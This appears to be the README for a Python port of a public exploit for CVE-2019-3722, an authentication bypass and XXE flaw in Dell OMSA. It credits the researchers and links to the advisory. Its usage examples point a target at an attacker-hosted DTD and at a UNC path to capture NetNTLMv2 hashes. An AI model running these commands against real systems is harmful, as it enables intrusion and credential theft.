Description: This is just a python port of the exploit found here: https://www.exploit-db.com/exploits/39909.
Versions Affected: confirmed on 8.3 and 7.3
Researcher: Original research: hantwister exploit ported by: @daveysec
Disclosure Link: https://www.exploit-db.com/exploits/39909
NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-3722
This abuses the way OMSA handles authentication to bypass authentication and forces the server to make a request which is vulnerable to XXE in the response sent by the attacker.
Your attacking host must be reachable on port 443 from the target.
CVE-2019-3722.py <yourip> <target:port> <path for XXE>
Example:
CVE-2019-3722.py 192.168.0.1 192.168.0.2:1311 http://192.168.0.1:8080/xxe.dtd
Or use it to intercept a NetNTLMv2 hash:
CVE-2019-3722.py 192.168.0.1 192.168.0.2:1311 file://\\192.168.0.1